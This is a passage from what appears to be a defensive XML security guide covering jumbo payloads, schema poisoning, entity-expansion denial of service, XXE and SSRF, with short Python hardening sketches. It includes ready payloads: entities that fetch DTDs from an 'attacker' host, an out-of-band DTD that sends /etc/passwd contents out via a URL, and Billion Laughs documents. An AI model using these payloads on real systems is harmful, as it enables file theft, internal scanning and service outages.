      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
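&lt;br /&gt;
Besides replacing &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; with a concrete number in &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;, an application can enforce its own cap. The Python sketch below uses the standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt; module; the limit of 1000 and the names &amp;lt;tt&amp;gt;MAX_BUY_ELEMENTS&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;within_occurrence_limit&amp;lt;/tt&amp;gt; are assumptions chosen for illustration:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

MAX_BUY_ELEMENTS = 1000  # hypothetical limit; tune it to what the application can process


def within_occurrence_limit(operation: ET.Element, limit: int = MAX_BUY_ELEMENTS) -> bool:
    """Return True when the number of direct buy children does not exceed the limit."""
    return limit >= len(operation.findall("buy"))


# Build a small document in memory instead of parsing untrusted input.
operation = ET.Element("operation")
for _ in range(3):
    ET.SubElement(operation, "buy")

print(within_occurrence_limit(operation))            # True
print(within_occurrence_limit(operation, limit=2))   # False
```

A check of this kind runs only after parsing, so it limits what the application processes but not what the parser itself has to read; a bounded &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; in the schema remains the earlier line of defense.&lt;br /&gt;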
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending a 1 GB XML document may cost the server only about a second of processing and might not be worth considering as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic needed to generate the attack relative to the server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header largename1=&amp;quot;LARGEVALUE&amp;quot; largename2=&amp;quot;LARGEVALUE&amp;quot; largename3=&amp;quot;LARGEVALUE&amp;quot; ...&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available on the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read files from the server. A schema of this type serves only as a suggestion for how to build a document; to be used safely, there must be a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
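&lt;br /&gt;
A deployment check for this problem could look like the following Python sketch. It assumes a POSIX filesystem; the function name &amp;lt;tt&amp;gt;is_world_writable&amp;lt;/tt&amp;gt; is hypothetical, and a temporary file stands in for the schema file:&lt;br /&gt;

```python
import os
import stat
import tempfile


def is_world_writable(path: str) -> bool:
    """Return True when the write bit for "other" users is set, as in -rw-rw-rw-."""
    mode = os.stat(path).st_mode
    # stat.filemode() renders the mode the way ls does, e.g. "-rw-rw-rw-";
    # index 8 is the write flag for "other" users.
    return stat.filemode(mode)[8] == "w"


# Demonstration on a temporary file that stands in for a schema file.
handle, schema_path = tempfile.mkstemp(suffix=".dtd")
os.close(handle)

os.chmod(schema_path, 0o666)            # the permissions from the listing above
print(is_world_writable(schema_path))   # True

os.chmod(schema_path, 0o644)            # only the owner may write
print(is_world_writable(schema_path))   # False

os.remove(schema_path)
```

The sketch inspects only the file itself; a writable parent directory would also let another user replace the schema, so a fuller check would cover the directory as well.&lt;br /&gt;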
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted over unencrypted HTTP. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
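&lt;br /&gt;
One possible safeguard, sketched here under stated assumptions, is to record the digest of a known-good copy of the schema and compare every retrieved copy against it before use. The Python example uses the standard &amp;lt;tt&amp;gt;hashlib&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;hmac&amp;lt;/tt&amp;gt; modules; the function name &amp;lt;tt&amp;gt;schema_matches_pin&amp;lt;/tt&amp;gt; and the placeholder bytes are hypothetical:&lt;br /&gt;

```python
import hashlib
import hmac


def schema_matches_pin(schema_bytes: bytes, expected_sha256_hex: str) -> bool:
    """Compare the SHA-256 digest of a schema with a digest recorded in advance."""
    actual = hashlib.sha256(schema_bytes).hexdigest()
    # compare_digest() performs the comparison in constant time.
    return hmac.compare_digest(actual, expected_sha256_hex.lower())


# Placeholder bytes standing in for a trusted copy of note.dtd.
trusted_copy = b"placeholder bytes standing in for note.dtd"
pinned_digest = hashlib.sha256(trusted_copy).hexdigest()

print(schema_matches_pin(trusted_copy, pinned_digest))                  # True
print(schema_matches_pin(trusted_copy + b" tampered", pinned_digest))   # False
```

The pinned digest has to be distributed through a channel the attacker cannot modify, and it must be updated whenever the schema owner publishes a legitimate change.&lt;br /&gt;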
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an Internet Protocol (IP) address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own IP addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee (or by an external attacker in control of these files) could impact all users processing the schemas. Consequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is a DTD).&lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000 * 100,000 (10^10) characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
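&lt;br /&gt;
The arithmetic behind this attack can be worked through in a few lines of Python. The figures come from the example above; the payload size is only approximate because the surrounding markup is ignored, and all names are assumptions made for this sketch:&lt;br /&gt;

```python
def quadratic_expansion(entity_length: int, references: int) -> int:
    """Characters produced when one entity is referenced many times."""
    return entity_length * references


ENTITY_LENGTH = 100_000       # characters in the definition of entity A
REFERENCES = 100_000          # number of references to A in the document body
REFERENCE_TEXT_LENGTH = 3     # one reference is three characters: ampersand, A, semicolon

# Approximate size of the document the attacker has to send.
payload_size = ENTITY_LENGTH + REFERENCES * REFERENCE_TEXT_LENGTH
# Size of the text the parser has to hold after expansion.
expanded_size = quadratic_expansion(ENTITY_LENGTH, REFERENCES)

print(payload_size)     # 400000
print(expanded_size)    # 10000000000
```

Roughly 400 KB of input therefore expands to about 10 GB of character data, which is what makes the attack asymmetric.&lt;br /&gt;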
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, the application will start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; expands to 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of these expands to 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. In the end, the parser has to produce 10^9 copies of the three-character string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, that is 3*10^9 (3,000,000,000) characters, which affects the CPU and/or memory and could make the parser crash.&lt;br /&gt;
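&lt;br /&gt;
The growth can be verified with a short calculation. This Python sketch assumes, as in the example, a base string of three characters, ten references per level, and nine levels; the function name &amp;lt;tt&amp;gt;expanded_length&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
def expanded_length(base_text: str, fan_out: int, levels: int) -> int:
    """Length of the top-level entity after every nested reference is expanded."""
    return len(base_text) * fan_out ** levels


# LOL1 holds 10 copies of LOL, LOL2 holds 10 copies of LOL1, and so on up to LOL9.
for level in (1, 2, 3):
    print(level, expanded_length("LOL", 10, level))   # 30, then 300, then 3000

print(expanded_length("LOL", 10, 9))   # 3000000000
```

Each additional level multiplies the output by ten while adding only one short line to the document, so the expansion is exponential in the number of levels.&lt;br /&gt;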
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:Envelope [&lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;SOAP-ENV:Envelope entityReference=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP-ENV=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAP-ENV:Body&amp;gt;&lt;br /&gt;
    &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP-ENV:Body&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP-ENV:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;xxe;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose value is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the entity is expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, such as a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root/&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what’s going on because you receive the complete responses from the server being queried, giving you an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
